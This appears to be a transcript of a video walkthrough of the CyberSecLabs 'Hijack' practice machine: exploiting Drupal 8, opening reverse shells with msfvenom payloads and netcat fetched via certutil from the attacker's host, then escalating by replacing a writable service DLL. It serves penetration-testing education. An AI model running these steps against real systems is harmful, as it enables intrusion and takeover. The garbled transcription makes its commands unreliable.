Welcome back to a new video. In this video, guys, we're going to be using one of the machines in Cyberseclabs. The machine goes by Hijack. And I powered up the machine now. And basically, what we're going to do in this machine, guys, as you can see, I have the Nmap scan results. And this video will be about manually exploiting content management system, which is in this case Drupal 8. So we're going to be manually exploiting Drupal, and we're going to be seeing how we can manually modify and use online exploits like we did in the last video. And of course, we're going to continue on to gaining access to the machine and escalating our privilege. Okay, so here the scan results. We have so much details here. The thing is, you can try as a pen tester, you can try on every service, on every port, try as much innovation as possible. But we don't want to make the video last too long. So we're here about methodology. The methodology in this video, guys, we have to find a way. As you can see, we have HTTP on port 80, and it is running Apache 2.4.37, and the platform is Drupal. So basically, I have other details here, which are the prohibited directories from being indexed by Google. So as you can see, HTTP, the robots file, it has 22 disallowed entries, right? So these entries cannot be indexed by search engine. So it's worse if we take a look at these files, at these directories, see what do we have there. Okay, so so the IP was, let's copy that. So we have, as you can see, guys, we have the main page or the landing page of the web server. So let's see what are these directories. Maybe the video is not about seeing those directories, but maybe you can solve the machine in other way. So if we type here user login, we have here login interface. Maybe you can try Hydra, or you can try brute force the username and password. But since we don't have much details about or any hints, or we can't see any way to create a word list and use that word list to hijack the username and password. Or you can try some SQL injection, cross-site scripting on the forms. But I'm giving you some ways, guys. Maybe you can try to solve the machine. Maybe there are other ways. But our objective here is to see if we can this content management system called Drupal, and we can find that from the footprint here or from the icon. So basically, what we do here, guys, let's go to find the version. It's Drupal 8, right? So in order to find a manual exploit, we're gonna do this. You're gonna select that horizontally and search exploit W for displaying the URLs. Drupal 8. Okay, for Drupal 8, we have a couple of exploits. So we have all of these, right? Maybe if we can find much more details about the exact version of this Drupal. So we have Drupal 8. Let's take a look at the source code. Filter for Drupal 8. Okay. So it appears that we may need to try these exploits one by one. All right. So let's take the first one and go there. 839 Drupal remote code execution. Excellent. Let's go down. So what we have here targets. So let's read the exploit. And the first thing we need to understand the exploit, guys. So as you can see, the exploit is written in Bash. And if you go down, we have a couple of comments to interpret and understand the purpose of this exploit. So here it's we have the target. We define the target, and the target is fed by user input into a target URL. All right. So in this case, it's going to be our IP address. Examples could be the IP or could be with HTTPS. Proxies verify true. URL equal target plus user register elements. Account. Okay, so here these two lines are about creating the payload, right? So here we create the first part of the payload, which is the URL, and here we have the payload itself, form ID, user register form, mail post, execute, mail type, markup, mail markup, echo. So we have smile, c hello.txt. R equal, and in this part, it's verifying if the payload exists and if it is exploitable. So upon the checking, if it is not exploitable, the terminal or you get non-exploitable as an output. Print check target hello plus txt. Okay. So and if it is an executable, you're gonna get shell. But apparently for me, guys, the payload execution starts from here, right? So forget about the mail. Here is the command that's gonna be executed. Echo the smile, and then it's gonna put it in hello.txt. And that's not what you want actually. Maybe the developer of this exploit intentionally wrote this command here. Maybe it's kind of, they want the experienced developers, they want us to change or not use the exploit irresponsibly. That's why here we have this, right? So it's not a complete exploit, it's an exploit, yeah, but it doesn't give you remote shell unless you read the exploit and understand how it works and do the necessary modifications. So in this exploit, the necessary modifications are the target and the command. So let's try this out. If it doesn't work, we're gonna proceed further with other exploits. So basically, we're gonna download that. Let's download it. Say file. It's Python. I said it. Oh my god. Sometimes I confuse Python with Bash scripting. Okay. So Python. Let's go to exploit. So it's in download. Let's put that to desktop. Okay. Oh my god, it's a very fatal mistake. Okay, clear. And now we're going to be heading to desktop to downloads. All right, so sudo move for and home. Okay, so the exploit is here. Let's first modify the exploit. Sudo nano. Okay. All right. Let's go down. So here's the Python script. The print statements, we don't need to do anything with these statements. If we go down, since the target is it's fed by user input, we don't need to modify this. We're going to be entering the target from the command line. What we need to modify, guys, is the command of desire. Okay. So basically here, instead of, let's make this a bit, okay. Okay, I don't think we need that. Let's collapse that. Okay. So we made this wider. Let's go to the right and change this So it starts from echo and ends with hello.txt. Okay, so let's go back to the box. Okay, we don't need. We know the box is Windows. So what we need to do, guys, we need to let the exploit do an action of our choice. Okay, so we don't want hello to echo some statement to a text file. We want to get a reverse shell back. One of the ways is we can create reverse shell in Msfn, and we can then download this exploit from here. So let's open your terminal to the right. Okay, make sure we go to the observer directory. Okay, Msfn -p Windows interpreter TCP lhost. It's gonna be well, lhost is gonna be the IP address of the interface that is connected by the VPN. So let's find out. Config. So it is 10.10.0.24. Okay, I hope I can memorize that. Let's go up. 10.0.24 L port. Okay, now choosing the L port. As I'm going to state that again, if you know that you are doing penetration tests for a system or a machine that is behind a firewall or behind a NAT device, you're going to need to choose a port that is below 1024. Of course, that depends on your knowledge and your familiarity with the environment. If the environment of your target has its firewall blocking ports or ports for the outgoing traffic, every port over 1024, and you're gonna need to do choose a port that is below 1024. And if you don't know anything about the environment or the firewall rules, you're gonna just gamble, right? And the right gamble is to choose a port below 1024. Okay. Now, since this is a test machine, I'm gonna choose a port that is I'm comfortable with. I don't want to just make sure everything goes smoothly for FFI. And let's choose the payload format. It's gonna be raw. Okay, exe. And then the file name will be, of course, remember that if the environment has an antivirus, you may consider use a payload made by a tool other than Msfn. One of the options are shelter. Okay. Since you know this is a testing machine, we don't need to consider the existence of antivirus in our payload creation process. So here -fexe, and the name will be shell 5. What? Oh, sudo. Okay. Sudo. Permission denied. I don't understand this. Why? Sudo Msfn -p lhost lport. Okay. So when? What's the problem now? Permission denied. I don't get it. Jesus. Okay. I have a solution for you. Okay, let's create a payload now. Msfn -p Windows operator first TCP and host 24 airport 5-f.exe win.exe. I just didn't get it, but I got permission denied. I know my user is in the Sudo group, and I have been using Sudo on this user for so long, I don't know why. Okay, so we have the payload created. Let's fire up our web server, sudo init start. All right. Okay, let's verify that we can download the payload. 168.94.136 win.exe. Let's try 3. Okay, let's go back, maximize the window, and let's rewrite the command here, collapse this. So over here, we're going to be using, let's cancel all of that. Yep. Okay, so cert util -url cache -f http 10.10.024 win.exe win.exe. I know what does this mean, right? We are downloading the tool, okay, or the payload from our machine, right? Okay, let's try that. Now, we're going to be giving permissions for the exploit to run. Sudo chmod -x for, all right, let's run Python for, and provide the URL. Let's grab the URL of the Drupal installation. Sometimes you get the Drupal, right? The Drupal CMS or the page on a directory like Drupal, right? So in this case, we're going to copy all the URL. In our case, let's copy only the IP. Go back, page selection. Of course, it's going to be HTTP. And let's try this out. URL copy. So again, we get 404. Okay, let's run Python server .mhttp.server, and let's now grab the exploit by running, grab the payload by running the exploit. No, okay. The URL, paste. So we got some errors. So the file is being downloaded, as you can see, and I guess the file has been downloaded. Now the next step, guys, is to execute that. Now how can we execute that? If we were in Linux, let me open the payload. Let me open the exploit again, sudo nano 4 Okay, now if I was on Linux, let's go down. We can execute two commands one at once. If you know how, in Linux, we can put just one semicolon. But since we are on Windows, we need to modify the command every time we want to execute a different one. So basically, now we executed this command, we downloaded the tool or the payload. Now the next step is to execute that, right? Now, first, if we're executing, we're going to need some listener on Metasploit, I guess. So let's stop the web server now. I don't need it. And I don't need that. Collapse, and I'm going to collapse that as well, or leave it. Okay, MSF console. Look at the heart. As if it's like Metasploit sending you guys some love, but it's opposite. Metasploit is the source of evil. Okay, so we put here use exploit multi-handler set payload Windows meta reverse TCP set lhost 10 10 0 4 set and port 5 set exit on session false, right? We want to keep the session alive, and set auto run script migrate -f. We want to migrate, want to let Metasploit migrate to another process once the session is established, not to lose the session or avoid the Metasploit die statement, right? Run. Okay, our listener is ready. What we need now is to go back to change the command here. Go to payload, and on the left, all we have to do here is to run win.exe, I guess. That's it. Let's run now the URL. Okay, let's take it from here. Copy. Oh God, what happened? I think I have copied space. No, okay. Let's see if I get my interpreter. Oh, I think we got some errors in the payload, but okay, we can try something else. If this didn't work, we can try. Let's go back. So this one didn't work, right? Okay. So we need some one-liner, right? Let's use PowerShell, and here we're gonna use Msfn, or we don't need to use that. Actually, we can use the same exploit, but instead of we can execute PowerShell command, right? So instead of that, we're gonna paste a PowerShell command. And here we're gonna replace the IP. It's gonna be 10.10.24. Oh, win.exe. All right. Okay. Let's fire up the web server again. Go to home, desktop, and here we're gonna fire up the web server again in order to download the exploit at the payload and run it again. 3 and -m http server. Let's fire up the exploit. Okay, so we got some errors. PowerShell. So what is our problem now? We can't use PowerShell? So I guess there is nothing I forgot to put in the comment here. Everything is right. All right. Try again. Invalid syntax. So we can't use PowerShell. All right. All right, in this case, we're gonna need to use some other method, guys. So we haven't been able to execute our payload. We haven't been able to execute that with PowerShell. I guess we need to do something else. In this case, we may try to download Netcat on the system and execute it, right? So let's download Netcat, but we don't know. We need to know what is the system, 64 or 32-bit. But we're gonna gamble and assume it is 64. I'm gonna download Netcat. Let's see the URL of the Netcat. Net 64. Let's download that. All right, we go back, and again we sudo move home download and okay, that sucks. And we have the okay, it's here now. We sudo move n64 to the desktop. All right, now we can download the tool from the exploit command line. Sudo nano. Okay, so sudo nano. To the right, to the right, to the right, to the right. All of that. Change. Okay, insert util dash URL cache if http 10.10.024 netcat64.exe and net. Okay, leave it netcat. All right, run. Oh gosh, so too many commands. Okay, now let's run the right, type it again. The load the URL. Okay. What happened? What happened? Let me see now. All right. So, but I got nothing here. Ah, I haven't specified the port. It's gonna be 8,000. All right. So the netcat has been downloaded. Now the next step is to execute. Gonna need to change the command again. All right. So we start from here. Remove all of that all the way. Okay, now here we're going to need to launch Netcat, right, and make it connect to our machine. So nc64.exe, and then we're going to specify -e cmd.exe. We specify now the IP 10.10.024, and it's going to be 4545 of course. I'm going to close my Metasploit here, exit, exit. And here I'm going to launch sudo nc lvp 4545. Okay, the lesson is running. Now here 4545. Oh no, sorry. Okay, 4545. Right. Launch again. The damn URL. Okay. I'm sorry for my language. Paste. Give me connection. Give me connection. Yeah. Okay. So we got here the reversal back. So it worked with Netcat, but be sure, guys, all the time to try all the stuff: PowerShell, Metasploit. Don't just stick with one way. So in this case, Netcat has worked, and my next step here is to do privilege escalation. Okay, let's do privilege escalation, guys. So as you know, in Windows privilege escalation, there are many ways, automated and manual. But all the time, I like to try with the services. So I go to my manual here. I go down and see what I can do. Go to Windows privilege escalation section. Here. All right. So instead of writing manually the commands, I'm gonna copy them. List running services. Auto started. Nope. Let me list the current services, right? All of the running services, current and non-current. Okay. Now, collapse that. Okay, let's see what we got here, guys. We always want to find a non-standard service, right? A non-standard one. A non-standard service is a service that the path of the service or whose path is not on system 32. So everything with system 32, I don't want it. So here we got something with the program files, as you can see, Amazon, and we got here. Let me do some. Let's go back to find a more flexible way. So I can here list the non-standard services. Okay. Let's go down. Okay. We go up and see the path. Here we got the path on the right. Okay, seems like we got some interesting stuff here. We go to the left. So we have Amazon, program files. We got AWS, which is Amazon as well. Bonjour service, go down. That's it. All right. Let's compare the output with this output here. Let me take this command again and remove the part. Okay, let's take that. And in the let's open this. I don't want to list the services that are auto-started. I am okay with the services that are not that don't start with the boot up. Okay, so let me remove that. All right. So here, let's list these services. See what we got. Okay, now let's see what we got. So you can see, guys, we got non-standard services. That's what we want. So we got Amazon, Apache, AWS, Bonjour, CFN, Hijack. Seems interesting, right? Since the name of the box is Hijack and the service name matches the name of the box, so we may consider using this service, right? So what we're gonna do, guys, we're gonna check with iCals, this one, right? Check if the service or the service path is writable. So let's go to the service path, cd c, and I need this backslash. I don't have it on my computer. Okay. And the file and the path is what is it? What was this? I guess I got some of the output omitted from here, right? Okay, let's take that. All right, here, program, and paste this directory. Okay, so we are in the executable file directory, which is run by the service, right? And the service name is Hijack, right? And it uses the Hijack app to run its, to run a process or to do the functionality of the service. So basically here, if we can, as we did in the, actually I didn't publish the video. We need to make this file or to replace this file with a file of our own, right? So if we go back and we need to check if this directory is writable. How can we do that? We use the iCards. All right. So here iCards. We put the directory name, which is hijack. All right, let's see here what we got. So administrators, let's check first this is the user. Who am I? I am Jack. All right, so as a user, what we can do here, we can't write on this directory. So we cannot write on this directory. So basically, I cannot Jack. So I can't overwrite this file since I don't have permissions to, I don't have write permissions on this directory, right? So we need something else. this tool, guys. So if we check, if we go to, we have some libraries here. Let's check this file. What we got here. So we have a DLL file. Not sure if I'm interested in that. Let's go back. Let me see if the libraries directory is writable. So I can type icogs libraries. Oh, okay. Let's compare. Go up. Let me see what we got here. So it seems to me, guys, that we can write on this directory according to the permissions I have here. So if I go to libraries, and let's try to download some file or a shell here, right? Let me to the left, to the right, to the left, to the right, to the left, to the right, to the left, to the right. Okay, to the left, to the right. Here we're gonna run Python again. All right, what we need to do here, guys, we're gonna see if we can download some files to this directory, right? So let's try with something like this exploit, right? So assert util URL cache dash f http and 024 8000, and the file name is 4448.py, and then we're gonna name it like test.py. Too many arguments. Let me run again. For cache, and I have dash f http 024 8000 py test.py. Not found. How many fours I've written? 1, 2, 3, 4. 1, 2, 3, 4. What's the problem now? There is no exploit. I'm on the wrong path. I'm sorry. Let me run again. Copy. Paste. Okay, directory. And as you can see, guys, we have been able to download the Python file to the libraries directory. Now, what we need to do, guys, here, we need to replace or execute some application of our choice in this directory. So what we can do here, guys, let me generate a new exploit, right? Or new payload. I'm sorry, I'm confusing the terms. Okay, so here we're gonna launch Msfn -p Windows better reverse TCP lhost equal 10 10.04 L port 4546 -fexp equal win2.exe. Error. I know why. Don't tell me why. The answer. Invalid payload. Windows Meterpreter. I got a typo here. I'm the best person in doing typos, actually. Meterpreter. Okay. So I have the file. Let's launch the web server. Again, let's grab the command and download our exploit. Fuck! Payload! Okay, so here instead of this, we're gonna type win2.x 2 win3.exe. All right, and we're gonna launch Msfn console. What? Okay, so here we can't download the file. Okay, we got some. Oh my god. Paste. Okay, so to make sure, so basically, guys, we were able to put some files in this directory, right? Maybe we can't, we haven't found any way, or we have found that this directory. So basically, guys, as you can see here, we were able to download some files from our machine into this directory, which is libraries, right? So we were able to overwrite, not overwrite, we have permissions to write on this directory, but on the contrary, we don't have permissions to write or modify this directory. That is why we need to do something with this custom DLL. So if we can change this custom DLL, guys, to do something of our choosing, right, we can get reverse shell back to our machine. We need to make this establish this like connection back. So when we run the service, which is hijack, the hijack application, which is the executable file, will run this DLL, which in turn runs our reverse shell. And given the fact that we have write permissions on this directory, we can override this file, right? So we can do some DLL hijacking here and replace the file DLL here with a file or DLL file generated by Msfn. Let's generate one. So here we split and we go to, let's go to desktop or leave desktop. Msfn -p Windows better reverse TCP. Lhost is going to be 10 024. Lport is going to be let's choose 4546, and -f it's going to be DLL, and the file name is going to be custom.dll. That's how we're going to override this file. Oh, I know, I forgot the sudo. All right, now we need to download that file, right, or that DLL file here, and overwrite with this file. So overwrite this with this. So run Python. Let me cancel this Python server instance. I'm going to collapse this terminal or leave it. Okay, leave it. Python -m http.server. And on the right on the machine, guys, we're going to download the tool or the DLL file. .url cache -f http 10 024 8000 custom.dll and custom.dll, right? Let's try now. And let's see here. So as we can see, guys, the file has been changed. Or we can't see actually. We only see the date here, but we can't see that if the file has actually been modified at this date. But I'm gonna if no one was working on this machine before me today, I would be the only person who modified this file. So this date refers back or refers to the date at which we downloaded the our exploit, right? Or sorry, our payload. Okay, So the only way to try this, we need to start the service. So before starting the service, we need Metasploit listener running. So for right here, right up, I'm going to launch Msfn console. I'm going to set use exploit multi handler, set lhost. Let's set the payload first. Payload Windows emitter reverse TCP. Set lhost 10.10.0.24. Set lport 4547. It was 4547 or 4646. Okay. We're gonna set exit on session false, and we're gonna run. Okay. So we're gonna start the service now. Sc start hijack. What's going on? I haven't. I have not launched the service yet. What kind of session I received here? Let me wait, see what was this. Okay. So it seems to me that we are using the port. Maybe it's the same port on my shell? No, no way. Okay. Let me cancel the listener. And over here, we're gonna cancel, stop the server and run the payload again. Another payload, guys. Or instead, let's remove the file first. Sudo rm custom DLL. Okay. And rerun that with 4647. Run. Okay. Python 3-m http.server. And here we're gonna type seret util-url cache f http custom DLL. Make sure to type uppercase because the file name is uppercase, right? Starts with uppercase. Yep, 404. I guess we have some typo, or the shell is not flexible. I need to type the command again. This is very exhausting. Cache f http 10.10.024 custom DLL, right? Again, custom. All right. Now, we're going to modify the listener here. The L port, it's going to be 4547. We're going to run sc hijack start. Let me go back. Maybe I got some, so it's correct. Sc, so start with here. Okay. So I started the service and I received Meterpreter shell here. So all we have to do now is to make sure that the shell is elevated to system, hopefully,